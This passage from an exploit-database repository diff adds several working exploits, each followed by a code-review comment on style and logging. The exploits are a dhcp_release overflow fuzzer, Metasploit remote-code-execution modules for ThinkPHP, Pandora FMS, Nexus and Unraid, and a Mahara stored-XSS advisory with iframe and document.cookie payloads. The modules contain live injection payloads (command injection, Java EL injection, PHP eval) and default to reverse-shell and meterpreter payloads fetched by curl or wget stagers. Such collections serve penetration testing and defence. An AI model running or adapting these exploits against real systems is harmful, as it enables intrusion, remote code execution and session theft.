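scripts/scripts` with the random name is never removed — since that is what an administrator reviewing the configuration would find.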
@@ -0,0 +1,38 @@
+# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
+# Date: 2020-04-06
+# Exploit Author: Josue Encinar
+# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
+# Version: 2.79
+# Tested on: Ubuntu 18.04
+
+
+from subprocess import Popen, PIPE
+
+data = ""
+bof = False
+for i in range (1, 200):
+ A = "A"*i
+ data = f"dhcp_release {A} 1 1"
+ try:
+ result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
+ error = result.stderr.read().decode()
+ if "Aborted (core dumped)" in error:
+ print("[+] Buffer Overflow detected!")
+ print(f"[*] Offset: {i}")
+ bof = True
+ break
+ except Exception as e:
+ print(f"[-] {e}")
+
+if not bof:
+ print("[-] No buffer overflow...")
+
+
+## Check line 273 in dhcp_release.c
+### strcpy(ifr.ifr_name, argv[1]);
+#
+## PoC:
+# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py
+# *** buffer overflow detected ***: dhcp_release terminated
+# [+] Buffer Overflow detected!
+# [*] Offset: 16
\ No newline at end of file
diff --git a/exploits/linux/local/40953.sh b/exploits/linux/local/40953.sh
index b00215e3a..e56a4c896 100755
--- a/exploits/linux/local/40953.sh
+++ b/exploits/linux/local/40953.sh
@@ -2,7 +2,7 @@
 #
 # Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
 # Google Dork: vesta control panel inurl:8083
-# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker
+# Exploit Author: Jaka Hudoklin @offlinehacker
 # Vendor Homepage: http://vestacp.com/
 # Software Link: https://github.com/serghey-rodin/vesta
 # Version: 0.9.7 - 0.9.8-16
diff --git a/exploits/linux/remote/48333.rb b/exploits/linux/remote/48333.rb
new file mode 100755
index 000000000..b7bcaa136
--- /dev/null
+++ b/exploits/linux/remote/48333.rb
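Review bot: `Popen(data, ..., shell=True)` hands an f-string to a shell and the child is never waited on or closed, so every iteration of the loop leaves an unreaped process and two open pipes behind; `subprocess.run(["dhcp_release", "A" * i, "1", "1"], capture_output=True, text=True)` followed by `error = result.stderr` performs the same check without a shell and cleans up after itself. The crash test also keys on the shell's `Aborted (core dumped)` message, which depends on which shell `/bin/sh` resolves to and on the locale, while the glibc line reproduced in the PoC transcript (`*** buffer overflow detected ***`) is emitted by the program itself and does not depend on either. The transcript and the pointer to `strcpy(ifr.ifr_name, argv[1])` at line 273 of dhcp_release.c would be easier to find in the header block alongside the other metadata than as trailing comments.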
@@ -0,0 +1,274 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::AutoCheck + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ThinkPHP Multiple PHP Injection RCEs', + 'Description' => %q{ + This module exploits one of two PHP injection vulnerabilities in the + ThinkPHP web framework to execute code as the web user. + + Versions up to and including 5.0.23 are exploitable, though 5.0.23 is + vulnerable to a separate vulnerability. The module will automatically + attempt to detect the version of the software. + + Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub. + }, + 'Author' => [ + # Discovery by unknown threaty threat actors + 'wvu' # Module + ], + 'References' => [ + # https://www.google.com/search?q=thinkphp+rce, tbh + ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP + ['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP + ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'], + ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce'] + ], + 'DisclosureDate' => '2018-12-10', # Unknown discovery date + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'Targets' => [ + ['Unix Command', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'} + ], + ['Linux Dropper', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper, + 'DefaultOptions' => { + 'CMDSTAGER::FLAVOR' => :curl, + 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' + } + ] + ], + 'DefaultTarget' => 1, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 
'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + )) + + register_options([ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Base path', '/']) + ]) + + register_advanced_options([ + # NOTE: You may want to tweak this for long-running commands like find(1) + OptFloat.new('CmdOutputTimeout', + [true, 'Timeout for cmd/unix/generic output', 3.5]) + ]) + + # XXX: https://github.com/rapid7/metasploit-framework/issues/12963 + import_target_defaults + end + +=begin + wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' - + * Trying 127.0.0.1... + * TCP_NODELAY set + * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) + > GET /index.php?s=1353 HTTP/1.1 + > Host: 127.0.0.1:8080 + > User-Agent: curl/7.54.0 + > Accept: */* + > + < HTTP/1.1 404 Not Found + < Date: Mon, 13 Apr 2020 06:42:15 GMT + < Server: Apache/2.4.25 (Debian) + < X-Powered-By: PHP/7.2.5 + < Content-Length: 7332 + < Content-Type: text/html; charset=utf-8 + < + { [7332 bytes data] + * Connection #0 to host 127.0.0.1 left intact + 5.0.20wvu@kharak:~$ +=end + def check + # An unknown route will trigger the ThinkPHP copyright with version + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'vars_get' => {'s' => rand_text_alpha(8..42)} + ) + + unless res + return CheckCode::Unknown('Target did not respond to check request.') + end + + unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m) + return CheckCode::Unknown( + 'Target did not respond with ThinkPHP copyright.' + ) + end + + # Get the first copyright <span> containing the version + version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text + + unless (version = version.scan(/^V([\d.]+)$/).flatten.first) + return CheckCode::Detected( + 'Target did not respond with ThinkPHP version.' 
+ ) + end + + # Make the parsed version a comparable ivar for automatic exploitation + @version = Gem::Version.new(version) + + if @version <= Gem::Version.new('5.0.23') + return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.") + end + + CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.") + end + + def exploit + # NOTE: Automatic check is implemented by the AutoCheck mixin + super + + # This is just extra insurance in case I screwed up the check method + unless @version + fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version') + end + + print_status("Targeting ThinkPHP #{@version} automatically") + + case target['Type'] + when :unix_cmd + execute_command(payload.encoded) + when :linux_dropper + # XXX: Only opts[:noconcat] may induce responses from the server + execute_cmdstager + else # This is just extra insurance in case I screwed up the info hash + fail_with(Failure::NoTarget, "Could not select target #{target['Type']}") + end + end + + def execute_command(cmd, _opts = {}) + vprint_status("Executing command: #{cmd}") + + if @version < Gem::Version.new('5.0.23') + exploit_less_than_5_0_23(cmd) + elsif @version == Gem::Version.new('5.0.23') + exploit_5_0_23(cmd) + else # This is just extra insurance in case I screwed up the exploit method + fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}") + end + end + +=begin + wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1 + * Trying 127.0.0.1... 
+ * TCP_NODELAY set + * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) + > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1 + > Host: 127.0.0.1:8080 + > User-Agent: curl/7.54.0 + > Accept: */* + > + < HTTP/1.1 200 OK + < Date: Mon, 13 Apr 2020 06:43:45 GMT + < Server: Apache/2.4.25 (Debian) + < X-Powered-By: PHP/7.2.5 + < Vary: Accept-Encoding + < Transfer-Encoding: chunked + < Content-Type: text/html; charset=UTF-8 + < + { [60 bytes data] + * Connection #0 to host 127.0.0.1 left intact + uid=33(www-data) gid=33(www-data) groups=33(www-data) + wvu@kharak:~$ +=end + def exploit_less_than_5_0_23(cmd) + # XXX: The server may block on executing our payload and won't respond + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'vars_get' => { + 's' => '/Index/\\think\\app/invokefunction', + 'function' => 'call_user_func_array', + 'vars[0]' => 'system', # TODO: Debug ARCH_PHP + 'vars[1][]' => cmd + }, + 'partial' => true + }, datastore['CmdOutputTimeout']) + + return unless res && res.code == 200 + + vprint_good("Successfully executed command: #{cmd}") + + return unless datastore['PAYLOAD'] == 'cmd/unix/generic' + + # HACK: Print half of the doubled-up command output + vprint_line(res.body[0, res.body.length / 2]) + end + +=begin + wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1 + * Trying 127.0.0.1... 
+ * TCP_NODELAY set + * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0) + > POST /index.php?s=captcha HTTP/1.1 + > Host: 127.0.0.1:8081 + > User-Agent: curl/7.54.0 + > Accept: */* + > Content-Length: 72 + > Content-Type: application/x-www-form-urlencoded + > + } [72 bytes data] + * upload completely sent off: 72 out of 72 bytes + < HTTP/1.1 200 OK + < Date: Mon, 13 Apr 2020 06:44:05 GMT + < Server: Apache/2.4.25 (Debian) + < X-Powered-By: PHP/7.2.12 + < Vary: Accept-Encoding + < Transfer-Encoding: chunked + < Content-Type: text/html; charset=UTF-8 + < + { [60 bytes data] + * Connection #0 to host 127.0.0.1 left intact + uid=33(www-data) gid=33(www-data) groups=33(www-data) + wvu@kharak:~$ +=end + def exploit_5_0_23(cmd) + # XXX: The server may block on executing our payload and won't respond + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'vars_get' => {'s' => 'captcha'}, + 'vars_post' => { + '_method' => '__construct', + 'filter[]' => 'system', # TODO: Debug ARCH_PHP + 'method' => 'get', + 'server[REQUEST_METHOD]' => cmd + }, + 'partial' => true + }, datastore['CmdOutputTimeout']) + + return unless res && res.code == 200 + + vprint_good("Successfully executed command: #{cmd}") + + return unless datastore['PAYLOAD'] == 'cmd/unix/generic' + + # Clean up output from cmd/unix/generic + vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, '')) + end + +end \ No newline at end of file diff --git a/exploits/linux/remote/48334.rb b/exploits/linux/remote/48334.rb new file mode 100755 index 000000000..d3fe0375f --- /dev/null +++ b/exploits/linux/remote/48334.rb 
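Review bot: In `check`, `version` is fetched with `&.text`, so it is nil when the copyright `<div>` has no `<span>`, yet the next line calls `version.scan(...)` unconditionally and would raise NoMethodError rather than return a CheckCode; `unless version && (version = version.scan(/^V([\d.]+)$/).flatten.first)` keeps the nil handling consistent with the safe navigation above it. `exploit_less_than_5_0_23` and `exploit_5_0_23` end with the same four-step response handling (status check, `vprint_good`, `cmd/unix/generic` test, output print), differing only in how the body is trimmed; a small private helper taking the response and a cleanup block would remove the duplication. The `'DisclosureDate'` comment says the discovery date is unknown, which is worth stating once in the `Description` as well so readers do not take the CVE publication date for the discovery date.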
@@ -0,0 +1,142 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Pandora FMS Ping Authenticated Remote Code Execution', + 'Description' => %q{ + This module exploits a vulnerability found in Pandora FMS 7.0NG and lower. + net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands. + }, + 'Author' => + [ + 'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module + ], + 'DisclosureDate' => '2020-03-09', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'Targets' => + [ + ['Automatic Target', {}] + ], + 'DefaultOptions' => + { + 'Payload' => 'linux/x86/meterpreter/reverse_tcp' + }, + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']), + OptString.new('USERNAME', [true, 'The username to authenticate with']), + OptString.new('PASSWORD', [true, 'The password to authenticate with']) + ] + ) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, 'index.php') + }) + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + unless res.body =~ /Pandora/i + return CheckCode::Safe + end + + pandora_version = res.body.scan(/<div id="ver_num">v(.*?)<\/div>/).flatten.first + version = Gem::Version.new(pandora_version) + + print_status("Pandora FMS version #{version}") if version + + if Gem::Version.new(version) <= Gem::Version.new('7.0NG') + return Exploit::CheckCode::Appears + end + + CheckCode::Detected + end + + def authenticate + res = send_request_cgi({ + 'method' => 
'POST', + 'uri' => normalize_uri(target_uri, 'index.php'), + 'vars_get' => { + 'login' => '1' + }, + 'vars_post' => { + 'nick' => datastore['USERNAME'], + 'pass' => datastore['PASSWORD'], + 'login_button' => 'Login' + } + }) + + return auth_succeeded?(res) + end + + def auth_succeeded?(res) + unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS') + print_error('Authentication failed!') + return false + end + print_good('Successfully authenticated') + print_status('Attempting to retrieve session cookie') + @cookie = res.get_cookies + unless @cookie.include?('PHPSESSID') + print_error('Error retrieving cookie!') + return false + end + print_good("Successfully retrieved session cookie: #{@cookie}") + true + end + + def exploit + print_status('Exploiting...') + execute_cmdstager(flavor: :wget, nospace: true) + end + + def execute_command(cmd, opts = {}) + print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})") + auth = authenticate + unless auth + fail_with Failure::NoAccess, 'Please provide a valid username and password.' + end + + id_agente = 1 + while !session_created? && id_agente <= 10 + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, 'index.php'), + 'cookie' => @cookie, + 'vars_get' => { + 'sec' => 'estado', + 'sec2' => 'operation/agentes/ver_agente', + 'tab' => 'extension', + 'id_agente' => "#{id_agente}", + 'id_extension' => 'network_tools' + }, + 'vars_post' => { + 'operation' => '2', + 'select_ips' => ";#{cmd}", + 'community' => 'public', + 'submit' => 'Execute' + } + }) + + id_agente += 1 + end + end +end \ No newline at end of file diff --git a/exploits/linux/remote/48343.rb b/exploits/linux/remote/48343.rb new file mode 100755 index 000000000..13456ea0f --- /dev/null +++ b/exploits/linux/remote/48343.rb 
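Review bot: In `check`, `version = Gem::Version.new(pandora_version)` runs before anything confirms that the `ver_num` scan matched, so a page without that element passes nil to Gem::Version (which RubyGems only tolerates with a deprecation warning, treating it as version 0), and the following `print_status(...) if version` guard never skips because a Gem::Version object is always truthy; add `return CheckCode::Detected unless pandora_version` right after the scan and drop the redundant second `Gem::Version.new(version)` on the comparison line. Separately, `execute_command` writes the password in clear text via `print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")`, which puts the credential into console output and saved logs; print the username only. The same applies to `print_good("Successfully retrieved session cookie: #{@cookie}")`, which logs a live PHPSESSID.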
@@ -0,0 +1,196 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::AutoCheck + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nexus Repository Manager Java EL Injection RCE', + 'Description' => %q{ + This module exploits a Java Expression Language (EL) injection in Nexus + Repository Manager versions up to and including 3.21.1 to execute code + as the Nexus user. + + This is a post-authentication vulnerability, so credentials are required + to exploit the bug. Any user regardless of privilege level may be used. + + Tested against 3.21.1-01. + }, + 'Author' => [ + 'Alvaro Muñoz', # Discovery + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2020-10199'], + ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'], + ['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31'] + ], + 'DisclosureDate' => '2020-03-31', # Vendor advisory + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'Targets' => [['Nexus Repository Manager <= 3.21.1', {}]], + 'DefaultTarget' => 0, + 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'}, + 'CmdStagerFlavor' => %i[curl wget], + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + )) + + register_options([ + Opt::RPORT(8081), + OptString.new('TARGETURI', [true, 'Base path', '/']), + OptString.new('USERNAME', [true, 'Nexus username', 'admin']), + OptString.new('PASSWORD', [true, 'Nexus password']) + ]) + end + + def post_auth? + # Pre-auth RCE? 
https://twitter.com/iamnoooob/status/1246182773427240967 + true + end + + # Send a GET / request to the server, check the response for a Server header + # containing the Nexus version, and then check if it's a vulnerable version + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path) + ) + + unless res + return CheckCode::Unknown('Target did not respond to check request.') + end + + unless res.headers['Server'] + return CheckCode::Unknown('Target did not respond with Server header.') + end + + # Example Server header: + # Server: Nexus/3.21.1-01 (OSS) + version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first + + unless version + return CheckCode::Unknown('Target did not respond with Nexus version.') + end + + if Gem::Version.new(version) <= Gem::Version.new('3.21.1') + return CheckCode::Appears("Nexus #{version} is a vulnerable version.") + end + + CheckCode::Safe("Nexus #{version} is NOT a vulnerable version.") + end + + def exploit + # NOTE: Automatic check is implemented by the AutoCheck mixin + super + + print_status("Executing command stager for #{datastore['PAYLOAD']}") + + # This will drop a binary payload to disk and execute it! 
+ execute_cmdstager( + noconcat: true, + cookie: login(datastore['USERNAME'], datastore['PASSWORD']) + ) + end + + def login(username, password) + print_status("Logging in with #{username}:#{password}") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, + '/service/rapture/session'), + 'vars_post' => { + 'username' => Rex::Text.encode_base64(username), + 'password' => Rex::Text.encode_base64(password) + }, + 'partial' => true # XXX: Return partial response despite timeout + }, 3.5) + + unless res + fail_with(Failure::Unknown, 'Target did not respond to login request') + end + + cookie = res.get_cookies + + unless res.code == 204 && cookie.match(/NXSESSIONID=[\h-]+/) + fail_with(Failure::NoAccess, 'Could not log in with specified creds') + end + + print_good("Logged in with #{cookie}") + cookie + end + + # This is defined so that CmdStager can use it! + def execute_command(cmd, opts = {}) + vprint_status("Executing command: #{cmd}") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, + '/service/rest/beta/repositories/go/group'), + # HACK: Bypass CSRF token with random User-Agent header + 'agent' => rand_text_english(8..42), + 'cookie' => opts[:cookie], + 'ctype' => 'application/json', + 'data' => json_payload(cmd) + ) + + unless res + fail_with(Failure::Unknown, 'Target did not respond to payload request') + end + + unless res.code == 400 && res.body.match(/java\.lang\.UNIXProcess@\h+/) + fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}") + end + + print_good("Successfully executed command: #{cmd}") + end + + # PoC based off API docs for /service/rest/beta/repositories/go/group: + # http://localhost:8081/#admin/system/api + def json_payload(cmd) + { + 'name' => 'internal', + 'online' => true, + 'storage' => { + 'blobStoreName' => 'default', + 'strictContentTypeValidation' => true + }, + 'group' => { + # XXX: memberNames has to be an array, but the API example was a 
string + 'memberNames' => [el_payload(cmd)] + } + }.to_json + end + + # Helpful resource from which I borrowed the EL payload: + # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf + def el_payload(cmd) + # HACK: Format our EL expression nicely and then strip introduced whitespace + el = <<~EOF.gsub(/\s+/, '') + ${ + "".getClass().forName("java.lang.Runtime").getMethods()[6].invoke( + "".getClass().forName("java.lang.Runtime") + ).exec("PATCH_ME") + } + EOF + + # Patch in our command, escaping any double quotes + el.sub('PATCH_ME', cmd.gsub('"', '\\"')) + end + +end \ No newline at end of file diff --git a/exploits/linux/remote/48353.rb b/exploits/linux/remote/48353.rb new file mode 100755 index 000000000..55f048b35 --- /dev/null +++ b/exploits/linux/remote/48353.rb 
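Review bot: `login` prints the password in clear text with `print_status("Logging in with #{username}:#{password}")`, which places the credential in the console output and in any log captured from the session; print the username alone or mask the password. `print_good("Logged in with #{cookie}")` likewise writes the live `NXSESSIONID` session cookie to the log, where a truncated or hashed form would serve the same diagnostic purpose. A one-line comment above `post_auth?` stating why it returns true even though the linked tweet raises a pre-auth question would save the next maintainer from re-investigating it.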
@@ -0,0 +1,101 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + Rank = ExcellentRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution', + 'Description' => %q{ + This module exploits two vulnerabilities affecting Unraid 6.8.0. + An authentication bypass is used to gain access to the administrative + interface, and an insecure use of the extract PHP function can be abused + for arbitrary code execution as root. + }, + 'Author' => + [ + 'Nicolas CHATELAIN <n.chatelain@sysdream.com>' + ], + 'References' => + [ + [ 'CVE', '2020-5847' ], + [ 'CVE', '2020-5849' ], + [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ], + [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ] + ], + 'License' => MSF_LICENSE, + 'Platform' => ['php'], + 'Privileged' => true, + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 10 2020' + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/']) + ] + ) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), + 'method' => 'GET' + ) + + unless res + return CheckCode::Unknown('Connection failed') + end + + unless res.code == 200 + return CheckCode::Safe('Unexpected reply') + end + + /\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body + + if version && Gem::Version.new(version) == Gem::Version.new('6.8.0') + return CheckCode::Appears("Unraid version #{version} appears to be vulnerable") + end + + CheckCode::Safe + end + + def 
exploit + begin + vprint_status('Sending exploit code') + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), + 'method' => 'GET', + 'encode_params' => false, + 'vars_get' => + { + 'path' => 'x', + 'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal') + } + ) + + if res.nil? + print_good('Request timed out, OK if running a non-forking/blocking payload...') + elsif res.code == 302 + fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.') + else + print_warning("Unexpected response code #{res.code}, please check your payload.") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/48367.txt b/exploits/linux/webapps/48367.txt new file mode 100644 index 000000000..acf9f3180 --- /dev/null +++ b/exploits/linux/webapps/48367.txt 
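Review bot: `check` reports `CheckCode::Safe` both when the reply is not 200 and when the body holds no parseable version string, so a 401/403 from a proxy, a 404 from a wrong TARGETURI, or a page that simply omits `Version:` is presented as "not vulnerable" rather than "undetermined". Guard the version branch with `return CheckCode::Unknown('Could not determine Unraid version') unless version` before the final `CheckCode::Safe`, and consider `CheckCode::Unknown('Unexpected reply')` for the non-200 path, since neither outcome actually rules the vulnerable version out. In `exploit`, `print_good` on a `nil` response presents a timeout as success although nothing has been confirmed at that point; `print_status` with the same text states it neutrally.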
@@ -0,0 +1,248 @@ +# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-21 +# Vendor: https://mahara.org +# Software Link: https://launchpad.net/mahara +# CVE: N/A + +Document Title: +=============== +Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2217 + +Release Date: +============= +2020-04-21 + +Common Vulnerability Scoring System: +==================================== +4.3 + +Affected Product(s): +==================== +Catalyst IT Ltd. +Product: Mahara v19.10.2 - CMS (Web-Application) +https://launchpad.net/mahara & https://mahara.org + +Vulnerability Disclosure Timeline: +================================== +2020-04-21: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official Mahara v19.10.2 CMS web-application series. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser +to web-application requests from the application-side. + +The persistent vulnerability is located in the `nombre` and +`descripción` parameters of the `Ficheros` module in the +`groupfiles.php` file. +Remote attackers with low privileges are able to inject own malicious +persistent script code as files and foldernames. The injected code can +be used to attack the frontend or backend of the web-application. The +request method to inject is POST and the attack vector is located on +the application-side. Files are able to be reviewed in the backend by +higher privileged accounts and can be shared. 
+ +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Ficheros (Files Manager) + +Vulnerable Input(s): +[+] Crear Carpeta + +Vulnerable File(s): +[+] groupfiles.php + + +Vulnerable Parameter(s): +[+] nombre +[+] descripción + +Affected Module(s): +[+] Página principal + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by low privileged web +application user account with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce ... +1. Open the web-application and login as regular user +2. Move inside the mygroup management +3. Open the ficheros tab on top +4. Inject test payload into the crear carpeta (Nombre & Descripción) +input field for the página principal to output +Note: The execution point occurs on edit, list and delete interaction +5. The created path listings are available for higher privileged user +account that review (Backend) +6. Successul reproduce of the persistent cross site web vulnerability! 
+ + +PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal) +<tr id="file:7191" class="file-item folder no-hover ui-droppable"> +<td class="icon-cell"> +<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191" +tabindex="0"> +<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe +src=evil.source onload=alert(document.cookie)></iframe> +>"<iframe src=evil.source +onload=alert(document.cookie)></iframe></span> +<span class="icon-folder-open icon icon-lg " role="presentation" +aria-hidden="true"></span> +</div></td> +<td class="filename"> +<a +href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27" + +id="changefolder:7191" class="inner-link changefolder"> +<span class="sr-only">Carpeta:</span> +<span class="display-title ">>"<iframe src=evil.source +onload=alert(document.cookie)></iframe> +>"<iframe src=evil.source +onload=alert(document.cookie)></iframe></span> +</a></td> +<td class="filedescription d-none d-md-table-cell"> +>"<iframe></iframe> >"<iframe></iframe></td> +<td class="filesize"></td> +<td class="filedate">20/04/2020</td> +<!-- Ensure space for 3 buttons (in the case of a really long single +line string in a user input field --> +<td class="text-right control-buttons "> +<div class="btn-group"> +... ... 
+<button name="files_filebrowser_edit[7191]" class="btn btn-secondary +btn-sm"> +<span class="icon icon-pencil-alt icon-lg" role="presentation" +aria-hidden="true"></span> +<span class="sr-only">Edit folder ">"<iframe +src=evil.source +onload=alert(document.cookie)></iframe> +>"<iframe src=evil.source +onload=alert(document.cookie)></iframe>"</span></button> +<button name="files_filebrowser_delete[7191]" class="btn btn-secondary +btn-sm"> +<span class="icon icon-trash-alt text-danger icon-lg" +role="presentation" aria-hidden="true"></span> +<span class="sr-only">Delete folder ">"<iframe +src=evil.source +onload=alert(document.cookie)></iframe> +>"<iframe src=evil.source +onload=alert(document.cookie)></iframe>"</span> +</button></div></td> + + +--- PoC Session Logs [POST] --- (Mygroup Ficheros) +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------98107146915324237501974151621 +Content-Length: 4879 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; 